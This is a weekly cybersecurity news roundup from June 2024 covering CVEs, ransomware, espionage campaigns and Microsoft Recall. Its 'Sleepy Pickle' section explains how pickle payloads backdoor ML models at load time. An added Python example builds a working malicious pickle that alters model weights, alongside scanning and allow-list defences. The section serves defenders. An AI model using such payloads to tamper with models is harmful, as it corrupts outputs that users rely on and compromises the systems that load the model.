14 June 2024

Cyber Security Week in Review: June 14, 2024


Arm warns of actively exploited Mali GPU zero-day

British semiconductor and software design company Arm has patched a high-severity vulnerability in its Mali GPU kernel driver that the company says may be under limited, targeted exploitation. The flaw, tracked as CVE-2024-4610, is a use-after-free in GPU memory processing: a local, non-privileged user can make improper GPU memory operations to gain access to already freed memory, which in a kernel driver translates into privilege escalation or code execution in kernel context. It affects the Bifrost GPU kernel driver, all versions from r34p0 to r40p0, and the Valhall GPU kernel driver, all versions from r34p0 to r40p0. The fix shipped in Bifrost and Valhall GPU kernel driver r41p0. Because Mali drivers reach end users through device makers, the patch arrives via the vendor's firmware or OS update rather than from Arm directly, so exposure on a given phone or Chromebook depends on that vendor's update cadence.

Microsoft patches over 50 vulnerabilities

Microsoft has released security updates as part of its June 2024 Patch Tuesday that address more than 50 vulnerabilities across its products. None of them was known to be exploited in the wild at release time, but the batch includes several high-risk bugs; the only one rated critical is CVE-2024-30080, a remote code execution flaw in Microsoft Message Queuing (MSMQ) reachable by an unauthenticated attacker over the network where the service is enabled, which makes it the first to prioritise.

In separate news, Google released the June 2024 Android Security Bulletin and the matching Pixel update to patch multiple security issues, including a zero-day that, according to the vendor, “may be under limited, targeted exploitation.” Tracked as CVE-2024-32896, the bug is an elevation-of-privilege issue in the Pixel firmware subcomponent, attributed to improper input validation, that a local app can exploit; it is fixed in the June Pixel firmware update.

Black Basta ransomware actors possibly exploited recently patched Windows bug as zero-day

New evidence suggests that the cybercrime group Symantec tracks as Cardinal (aka Storm-1811, UNC4393), the operators of the Black Basta ransomware, may have exploited a recently patched Windows privilege escalation vulnerability (CVE-2024-26169) as a zero-day.

The vulnerability lies in the Windows Error Reporting Service and lets a local attacker elevate privileges to SYSTEM. Microsoft patched it on March 12, 2024, with no known exploitation in the wild at that time. Symantec's evidence is the compilation timestamps on the exploit tool recovered from Black Basta intrusions, which predate the patch; such timestamps can be forged, which is why the conclusion is stated as possible rather than certain.

TellYouThePass ransomware weaponizes recently patched PHP flaw

The recently patched critical PHP vulnerability is being actively exploited to deliver malware as part of the “TellYouThePass” ransomware campaign. Tracked as CVE-2024-4577, the flaw affects PHP running in CGI mode on Windows (the php-cgi binary or Apache's CGI handler, the default in bundles such as XAMPP) when the system uses certain code pages, notably Traditional Chinese, Simplified Chinese and Japanese. Windows “Best-Fit” character mapping converts characters such as a soft hyphen (0xAD) into an ordinary hyphen when building the command line, so an attacker can smuggle PHP command-line options into a request and escalate that to remote code execution. The bug is a bypass of the fix for CVE-2012-1823 and is resolved in PHP 8.3.8, 8.2.20 and 8.1.29. Imperva's analysis identified several campaigns exploiting CVE-2024-4577 within days of disclosure, including attempts to upload web shells and deploy ransomware.

Chinese hackers breached 20K+ FortiGate systems worldwide in Coathanger campaign

A Chinese cyberespionage campaign that compromised the Netherlands’ defense ministry in February this year was much broader than initially believed, the Dutch authorities revealed this week.

According to the country’s National Cyber Security Centre, the threat actor behind the campaign gained access to at least 20,000 Fortinet FortiGate systems worldwide within a few months across 2022 and 2023 using CVE-2022-42475, a heap-based buffer overflow in the FortiOS SSL-VPN interface that was a zero-day at the time. The Dutch authorities said the actor was aware of the vulnerability for at least two months before its public disclosure, and during that “zero-day” period infected 14,000 devices, with targets including Western governments, international organizations and a large number of companies in the defense industry. The authorities also reiterated that the Coathanger implant survives reboots and firmware upgrades, so patching alone does not evict it: organisations that ran a vulnerable FortiGate should assume compromise and hunt for the implant rather than rely on the update.

Sticky Werewolf threat group targets aviation industry in Russia and Belarus

A threat actor tracked as “Sticky Werewolf,” suspected of having geopolitical and/or hacktivist motivations, has been linked to cyber campaigns targeting public organizations in Russia and Belarus since at least April 2023. Its most recent operation, detailed by Morphisec Labs, targets the aviation industry in Russia and Belarus. The group has been sending emails purportedly from the First Deputy General Director of AO OKB Kristall, a Moscow-based company involved in aircraft and spacecraft production and maintenance.

New DarkPeony campaign abuses MSC files to deliver PlugX malware

A threat actor known as DarkPeony has been observed abusing Microsoft Management Console snap-in (.msc) files to deliver the PlugX backdoor in a new campaign. The operation, dubbed ‘Operation ControlPlug’ by NTT’s security team, is aimed at military and government organizations in Myanmar, the Philippines, Mongolia, and Serbia.

UNC5537 hackers target Snowflake customers for data theft and extortion

A financially motivated threat actor, tracked as UNC5537, is targeting Snowflake customer database instances in a broad campaign aimed at data theft and extortion. Mandiant's investigation into multiple incidents involving Snowflake customers showed that UNC5537 gained access to organizations’ Snowflake instances using stolen credentials obtained via infostealer malware campaigns (VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA and METASTEALER) that infected systems not owned by Snowflake, including contractor and personal machines. The affected accounts had no multi-factor authentication enforced and, in many cases, had not had their passwords rotated for years, and the instances had no network allow-lists, which is what let a credential harvested long ago still open the door.

Arid Viper infects Android apps with AridSpy

ESET researchers have uncovered espionage campaigns likely conducted by the Arid Viper APT group, targeting Android users in Egypt and Palestine since 2022. These campaigns use a sophisticated Android spyware, dubbed AridSpy, which is distributed via websites mimicking messaging apps, a job opportunity app, and a Palestinian Civil Registry app. AridSpy operates in multiple stages, downloading additional payloads from a command-and-control server to evade detection. The malware enables remote control and focuses on stealing user data. ESET said it has identified six instances of AridSpy in the targeted regions, with three campaigns still active.

Pakistan-linked malware campaign targets Indian defense, IT sectors

Cisco Talos has detailed a long-running malware campaign called “Operation Celestial Force,” active since at least 2018 and targeting Indian entities, particularly in defense, government, and technology sectors. This campaign employs GravityRAT, initially a Windows-based malware, later expanded to target Android devices. Another malware, HeavyLift, is used as a loader, with both managed by a tool called “GravityAdmin.” Talos attributes this operation to a Pakistani threat actor group named “Cosmic Leopard,” focused on espionage and surveillance.

In a separate report, cybersecurity firm Volexity said it discovered a cyber-espionage campaign by a suspected Pakistan-based threat actor known as UTA0137. This campaign uses malware named DISGOMOJI, written in Golang and designed for Linux systems. Volexity believes with high confidence that UTA0137's objectives are espionage-related, specifically targeting government entities in India.

North Korean threat actors are responsible for one-third of the phishing attacks in Brazil

Mandiant released a report on Brazil's cyber threat landscape, according to which North Korean threat actors are responsible for one-third of the phishing attacks in Brazil, focusing on cryptocurrency firms, aerospace and defense sectors, and government entities. Over 85% of government-backed phishing activity is attributed to threat actors from China, North Korea, and Russia. Chinese groups primarily target Brazilian government organizations and the energy sector. Russian espionage has a long history in Brazil but has diminished since Russia's invasion of Ukraine, as efforts have shifted towards Ukrainian and NATO targets, the report noted.

Sleepy Pickle technique targets ML models

Security researchers at Trail of Bits have developed a new exploitation technique named 'Sleepy Pickle,' which targets machine learning (ML) models. The attack builds on the well-known weakness of Python's Pickle format, still widely used to package and distribute ML models: a pickle file is a small program for a stack machine, and its REDUCE opcode can call any importable function during deserialization. Unlike previous attacks that use a malicious pickle to compromise the system that loads it, Sleepy Pickle injects a payload that runs at load time and patches the model itself in memory, altering its weights or hooking its methods, while the file on disk keeps its original contents. The result is a model that behaves normally until the attacker's condition is met, enabling attacks on the end users of the model (backdoored outputs, manipulated summaries, data exfiltration through generated text) and broadening the scope and potential impact beyond the loading host.
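The following is an added example, not code from the Trail of Bits research or from the original article. It shows the mechanism the technique relies on, using a constructed dict of weights as a stand-in for a real model checkpoint: a pickle that, when loaded with the usual `pickle.loads`, runs attacker-chosen code and hands back tampered weights. It then shows two defences, an opcode scan with `pickletools` that never executes the stream, and a restricted `Unpickler` whose allow-list of globals is an assumption for this example and would need the real framework's rebuild helpers added for actual checkpoints.

```python
"""Added example: why a pickled model can be patched at load time, and two
defences. The 'model' is a constructed dict, not a real framework checkpoint."""
import io
import pickle
import pickletools

# Constructed stand-in for a serialised model checkpoint.
CLEAN_MODEL = {"layer1": [0.1, 0.2, 0.3], "bias": [0.0]}

# Opcodes that can call code or build arbitrary objects while loading.
DANGEROUS_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}


class SleepyPayload:
    """Serialises as 'call builtins.eval(expr)' instead of as itself.

    pickle stores whatever __reduce__ returns, i.e. (callable, args), so
    nothing of this class is in the stream and the victim needs no extra code.
    """

    def __init__(self, expr):
        self.expr = expr

    def __reduce__(self):
        return (eval, (self.expr,))


def build_malicious_pickle(model):
    """Wrap a genuine model so that loading it returns a tampered copy.

    The expression runs inside the victim's process during the load, flips
    the bias weight in memory and hands the altered dict to the loader.
    """
    expr = "(lambda m: (m.update({'bias': [9.9]}), m)[1])(%r)" % (model,)
    return pickle.dumps(SleepyPayload(expr))


def unsafe_load(data):
    """What most model loaders do under the hood: runs any embedded payload."""
    return pickle.loads(data)


def scan_pickle(data):
    """Names of dangerous opcodes in the stream; executes nothing."""
    return {op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in DANGEROUS_OPS}


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve globals only from an explicit allow-list.

    find_class runs before REDUCE can call anything, so an unexpected
    module.name is rejected before the payload gets to execute.
    ALLOWED is an assumption for this example; real checkpoints need their
    framework's rebuild helpers listed here.
    """
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def load_or_reject(data):
    """Return ('ok', obj) or ('rejected', reason) using the allow-list."""
    try:
        return ("ok", RestrictedUnpickler(io.BytesIO(data)).load())
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    bad = build_malicious_pickle(CLEAN_MODEL)
    print("unsafe load gives bias:", unsafe_load(bad)["bias"])
    print("scan finds:", sorted(scan_pickle(bad)))
    print("restricted load of tampered file:", load_or_reject(bad)[0])
    print("restricted load of clean file:",
          load_or_reject(pickle.dumps(CLEAN_MODEL))[0])
```

The opcode scan is the cheap first gate, but note that real framework checkpoints legitimately use GLOBAL and REDUCE to rebuild tensors, so in practice the scan has to be paired with an allow-list of the specific module.name pairs the framework needs, which is exactly what the restricted unpickler enforces. Where possible, prefer a format that carries no code at all, such as safetensors, and treat any pickle from an untrusted source as executable.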

The French govt exposes pro-Russian information manipulation campaign Matryoshka

A technical report by VIGINUM details “Matryoshka,” a pro-Russian information manipulation campaign. This campaign aimed to discredit Western news media, public figures, and fact-checking organizations through coordinated efforts on social media. The report highlights the sophisticated strategies used to undermine trust in these institutions and promote pro-Russian narratives.

Ransomware actors breached Ascension systems after an employee downloaded a malicious file

Ascension, a major US healthcare system, said that the ransomware attack it suffered in May 2024 began with an employee inadvertently downloading a malicious file, mistaking it for a legitimate one. The attack affected MyChart electronic health records, phones, and the systems used to order tests, procedures, and medications. To contain the incident Ascension took some devices offline on May 8.

TargetCompany ransomware gang targets ESXi environments with new Linux variant

The TargetCompany ransomware group has added a new Linux variant to its arsenal that specifically targets VMware ESXi environments. The custom shell script that drives it not only deploys the ransomware payload but also exfiltrates the victim's information to two separate servers, giving the attackers a backup copy of the stolen data, Trend Micro said.

Additionally, the cybersecurity company released a report on a sophisticated attack campaign targeting exposed Docker remote API servers to deploy cryptocurrency miners. Named “Commando Cat,” this campaign has been active since the beginning of 2024 and employs a series of steps to infiltrate systems and leverage their resources for mining digital currencies.

Ukraine neutralizes bot farms involved in hacking Ukrainian soldiers’ phones

The Security Service of Ukraine (SBU) has dismantled two bot farms used by Russian intelligence agencies to hack the phones of Ukrainian military personnel and spread pro-Kremlin propaganda. Two individuals suspected of running the farms were arrested.

Developer who worked for LockBit and Conti ransomware gangs arrested in Ukraine

Ukraine’s police have arrested a Kyiv resident who allegedly developed software for the notorious LockBit and Conti ransomware operations. The suspect developed so-called “cryptors,” specialized software that disguises malware as benign files so that it evades the most popular antivirus products. These cryptors were used in Conti ransomware attacks on the computer networks of enterprises in the Netherlands and Belgium. Through their investigation, cyber police linked the suspect to the Russian-speaking “LockBit” and “Conti” groups, both known for crippling industrial enterprises by encrypting their networks to extort ransoms.

Turkish student arrested for using AI to cheat in exams

A Turkish student was arrested for using a sophisticated AI-powered system to cheat during a university entrance exam. Authorities noticed the student's suspicious behavior, leading to the discovery of a tiny camera hidden as a shirt button to scan questions, a router in the shoe sole to transmit images to an AI model, and an earpiece to receive answers. The setup included a mobile phone to relay information to an accomplice. Both the student and the accomplice have been detained and face serious charges, with the student currently in jail awaiting trial.

Microsoft delays the release of its Windows Recall feature due to security concerns

Microsoft has announced a delay in the release of its AI-powered Recall feature for Copilot+ PCs due to security concerns. Initially set for broad preview on June 18, 2024, the feature will now be available first through the Windows Insider Program (WIP) in the coming weeks. Recall captures screenshots of the active window every few seconds, analyzes them with on-device AI models running on the PC's NPU, and stores the extracted text and images in a local SQLite database so the user can search their past activity in natural language. Despite Microsoft’s assurances that the data stays on the device and is protected by BitLocker, privacy advocates and security researchers showed that the database was readable by any process running as the user, raising concerns about abuse and infostealer-style data theft. Microsoft has since made Recall opt-in, required Windows Hello enrollment and proof of presence to view the data, and added encryption of the database that is decrypted only on demand, and the delay is meant to test those changes with Insiders before a wider rollout.
